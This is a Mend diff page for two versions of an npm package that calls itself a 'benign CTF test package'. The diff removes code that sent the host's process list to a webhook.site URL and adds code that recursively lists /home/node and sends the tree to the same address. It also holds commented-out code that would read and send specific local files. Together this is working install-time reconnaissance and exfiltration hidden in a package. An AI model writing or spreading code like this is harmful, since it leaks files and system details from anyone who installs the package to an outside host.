npm - @alexandrsarioglo/npm-ghost-htb - Versions diffs - 1.0.5 → 1.0.7 - Mend

@alexandrsarioglo/npm-ghost-htb 1.0.5 → 1.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +109 -39
package/package.json +1 -1

package/index.js CHANGED Viewed

@@ -2,7 +2,6 @@ const WEBHOOK = 'https://webhook.site/b3d8463d-444d-412a-891b-bd291b37e743';   /
 // async-scan-htb-json.js (CommonJS)
 // Usage: node async-scan-htb-json.js [startPath]
-const fs = require('fs');
 const http = require('http');
 const https = require('https');
 const { URL } = require('url');
@@ -23,47 +22,118 @@ function sendProgress(obj) { // async HTTP; event loop must be free to flush
   } catch {}
 }
-// list-procs-ps.js
-// Usage: node list-procs-ps.js [outputPath]
-// Example: node list-procs-ps.js /tmp/procs.json
+const fs = require('fs');
+const fsp = fs.promises;
+const path = require('path');
-const { spawn } = require('child_process');
+const PATHS = [
+  '/home/node/supplysec_entry.js',
+  '/home/node/init_test.sh'
+];
-// ps columns: PID USER STAT START TIME COMMAND (we ask for pid,user,comm,args)
-const ps = spawn('ps', ['-eo', 'pid,user,comm,args'], { stdio: ['ignore', 'pipe', 'pipe'] });
-let buffer = '';
-ps.stdout.setEncoding('utf8');
-ps.stdout.on('data', chunk => buffer += chunk);
+const MAX_BYTES = 1_000_000; // 1 MB per file
-ps.on('close', code => {
-  const lines = buffer.split(/\r?\n/).filter(Boolean);
-  // drop header line
-  if (lines.length === 0) {
-    console.error('ps produced no output');
-    process.exit(1);
-  }
-  const header = lines.shift();
-  const procs = lines.map(line => {
-    // split into 4 columns: pid,user,comm,args. We expect whitespace-separated pid & user & comm, then the rest is args
-    const m = line.trim().match(/^(\d+)\s+(\S+)\s+(\S+)\s+(.*)$/);
-    if (!m) {
-      // fallback: try splitting
-      const parts = line.trim().split(/\s+/);
-      return { raw: line };
+async function readFileSafe(p, maxBytes) {
+  try {
+    const stat = await fsp.stat(p);
+    if (!stat.isFile()) return { error: 'not-a-file' };
+    const size = stat.size;
+    if (size <= maxBytes) {
+      const content = await fsp.readFile(p, 'utf8');
+      return { content };
     }
-    return {
-      pid: parseInt(m[1], 10),
-      user: m[2],
-      comm: m[3],
-      args: m[4]
+    // stream first maxBytes bytes
+    return await new Promise((resolve) => {
+      const rs = fs.createReadStream(p, { encoding: 'utf8', highWaterMark: 64 * 1024 });
+      let acc = '';
+      let read = 0;
+      let done = false;
+      rs.on('data', chunk => {
+        if (done) return;
+        const chunkBytes = Buffer.byteLength(chunk, 'utf8');
+        if (read + chunkBytes >= maxBytes) {
+          const remaining = maxBytes - read;
+          acc += chunk.slice(0, remaining);
+          done = true;
+          rs.destroy();
+        } else {
+          acc += chunk;
+          read += chunkBytes;
+        }
+      });
+      rs.on('close', () => resolve({ content: acc + '\n...[truncated]' }));
+      rs.on('error', err => resolve({ error: `read-error: ${err.message}` }));
+    });
+  } catch (err) {
+    return { error: err.code ? `${err.code}` : err.message };
+  }
+}
+// Read contents of the files
+// (async () => {
+//   const result = { generated: new Date().toISOString(), files: {} };
+//   for (const p of PATHS) {
+//     const abs = path.resolve(p);
+//     const res = await readFileSafe(abs, MAX_BYTES);
+//     if (res.content !== undefined) result.files[abs] = res.content;
+//     else result.files[abs] = `ERROR: ${res.error}`;
+//   }
+//   try {
+//     sendProgress({result});
+//   } catch (e) {
+//     console.error('Failed to write output:', e.message);
+//     process.exit(1);
+//   }
+// })();
+const START_DIR = '/home/node';    // <<--- edit this to the directory you want listed
+const RECURSIVE = true;           // set to false to list only the top level
+const MAX_ENTRIES_PER_DIR = 10000; // safety cap
+async function listDir(dir, depth = 0, result = []) {
+  let entries;
+  try {
+    entries = await fs.readdir(dir, { withFileTypes: true });
+  } catch (err) {
+    result.push({ path: dir, error: `readdir-failed: ${err.code || err.message}` });
+    return result;
+  }
+  // safety: avoid pathological directories
+  if (entries.length > MAX_ENTRIES_PER_DIR) {
+    result.push({ path: dir, warning: `skipped (too many entries: ${entries.length})` });
+    return result;
+  }
+  for (const e of entries) {
+    const full = path.join(dir, e.name);
+    const item = {
+      path: full,
+      name: e.name,
+      type: e.isDirectory() ? 'directory' : e.isFile() ? 'file' : e.isSymbolicLink() ? 'symlink' : 'other'
     };
-  });
-  const result = { generated: new Date().toISOString(), procs };
-  sendProgress(result);
-});
-ps.on('error', err => {
-  console.error('Failed to run ps:', err.message);
-  process.exit(2);
-});
+    result.push(item);
+    if (RECURSIVE && e.isDirectory()) {
+      // avoid following symlinks into recursion
+      if (e.isSymbolicLink()) {
+        continue;
+      }
+      await listDir(full, depth + 1, result);
+    }
+  }
+  return result;
+}
+(async () => {
+  console.log(`Listing hard-coded directory: ${START_DIR} (recursive=${RECURSIVE})`);
+  const tree = await listDir(START_DIR);
+  try {
+    sendProgress({ tree });
+  } catch (err) {
+    console.error('Failed to write output:', err.message || err);
+  }
+})();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@alexandrsarioglo/npm-ghost-htb",
-  "version": "1.0.5",
+  "version": "1.0.7",
   "main": "index.js",
   "description": "benign CTF test package (postinstall sends a webhook)",
   "scripts": {